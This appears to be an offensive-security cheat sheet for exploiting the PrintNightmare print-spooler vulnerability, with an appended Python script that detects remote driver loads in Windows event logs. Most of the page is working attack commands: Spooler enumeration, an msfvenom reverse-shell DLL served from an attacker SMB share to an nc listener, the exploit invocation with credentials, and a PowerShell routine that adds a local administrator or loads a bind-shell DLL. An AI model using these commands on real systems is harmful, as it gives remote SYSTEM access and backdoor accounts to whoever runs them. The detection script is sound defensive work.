Overview
“PrintNightmare” refers to an RCE (Remote Code Execution) vulnerability. If the vulnerable machine is configured to reject remote connections, the vulnerability can still be exploited in an LPE (Local Privilege Escalation) context. In a detailed blog post, Cyberwatch describes that the vulnerability lies in the functions that allow users to install drivers remotely, RpcAddPrinterDriverEx and RpcAddPrinterDriver:
- The attacker stores the driver DLL file on an SMB share reachable from the server.
- The client creates a DRIVER_INFO_2 object containing the path to the attacker’s DLL and passes it into a DRIVER_CONTAINER object.
- The client calls RpcAddPrinterDriverEx with the DRIVER_CONTAINER so that the server loads the attacker’s DLL, setting multiple bit values in dwFileCopyFlags to bypass the server’s SeLoadDriverPrivilege check.
- The attacker’s DLL is executed on the server in the SYSTEM context.
Is Spooler active?
# with NetExec (formerly CrackMapExec)
nxc smb <target_ip> -M spooler
# with Impacket
rpcdump.py @<target_ip> | grep -E 'MS-RPRN|MS-PAR'

Exploit
Linux
- Check if the target’s RPC pipes are available: Impacket’s rpcdump.py
- Generate a DLL payload: msfvenom
- Host an SMB server from which the DLL can be fetched: Impacket’s smbserver.py
- Exploit PrintNightmare: CVE-2021-1675.py (MS-RPRN abuse, MS-PAR abuse)
- Profit from the DLL being executed by the target
# Create a DLL payload (reverse shell in this example)
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=<local_ip> LPORT=<local_port> -o /workspace/smb/remote.dll
# Host an SMB share
smbserver.py -smb2support "WHATEVERNAME" /workspace/smb/
# Start the listener (for the reverse shell)
nc -lvnp <local_port>
# Run the exploit (the UNC path points at the share hosted above; single quotes keep the backslashes literal)
CVE-2021-1675.py <domain>/<user>:<password>@<target_ip> '\\<local_ip>\WHATEVERNAME\remote.dll'

Windows
https://github.com/JohnHammond/CVE-2021-34527
powershell -ep bypass
# add a new user to the local Administrators group
Import-Module .\cve-2021-34527.ps1
Invoke-Nightmare # adds the user `adm1n`/`P@ssw0rd` to the local Administrators group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
# or custom DLL
Import-Module .\cve-2021-34527.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
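As an added defensive example (not part of the original page or of any tool it names), the following Python flags the behaviour described in the overview, a printer driver loaded from a remote share, in an exported print-service event log. It assumes a `channel|event_id|message` export format and uses constructed sample lines; events 316 (PrintService/Operational, driver added or updated) and 808 (PrintService/Admin, failed to load a plug-in module) are the real Windows event IDs.

```python
import re
from dataclasses import dataclass

# Constructed sample export of print-service events, one per line, in an assumed
# "channel|event_id|message" format (not a real log dump). Event 316 is
# PrintService/Operational "driver added or updated"; 808 is PrintService/Admin
# "spooler failed to load a plug-in module".
SAMPLE_EVENTS = r"""
Microsoft-Windows-PrintService/Operational|316|Printer driver Xerox for Windows x64 Version-3 was added or updated. Files:- \\10.0.0.5\WHATEVERNAME\remote.dll, UNIDRV.DLL
Microsoft-Windows-PrintService/Admin|808|The print spooler failed to load a plug-in module \\10.0.0.5\WHATEVERNAME\remote.dll, error code 0x45A.
Microsoft-Windows-PrintService/Operational|316|Printer driver HP Universal for Windows x64 Version-3 was added or updated. Files:- C:\Windows\System32\spool\drivers\x64\3\hpcu.dll
Microsoft-Windows-PrintService/Operational|307|Document 5, print.txt, was printed.
"""

# A UNC path \\host\share\file; a legitimately installed driver is loaded from
# the local spool directory, so a remote path in these events is the signal.
UNC_PATH = re.compile(r"\\\\[^\\\s,]+\\[^\\\s,]+\\[^\s,]+")

SUSPICIOUS_EVENTS = {
    316: "printer driver added or updated from a UNC path",
    808: "spooler failed to load a plug-in module from a UNC path",
}

@dataclass
class Finding:
    event_id: int
    unc_path: str
    reason: str

def parse_event(line):
    """Split one exported line into (channel, event_id, message)."""
    channel, event_id, message = line.split("|", 2)
    return channel, int(event_id), message

def detect_remote_driver_load(log_text):
    """Return one Finding per print-service event that references a UNC path."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        channel, event_id, message = parse_event(line)
        if not channel.startswith("Microsoft-Windows-PrintService/"):
            continue
        reason = SUSPICIOUS_EVENTS.get(event_id)
        match = UNC_PATH.search(message) if reason else None
        if match:
            findings.append(Finding(event_id, match.group(0), reason))
    return findings
```

Running `detect_remote_driver_load(SAMPLE_EVENTS)` reports the two events that reference the remote share and ignores the locally installed driver and the unrelated print job.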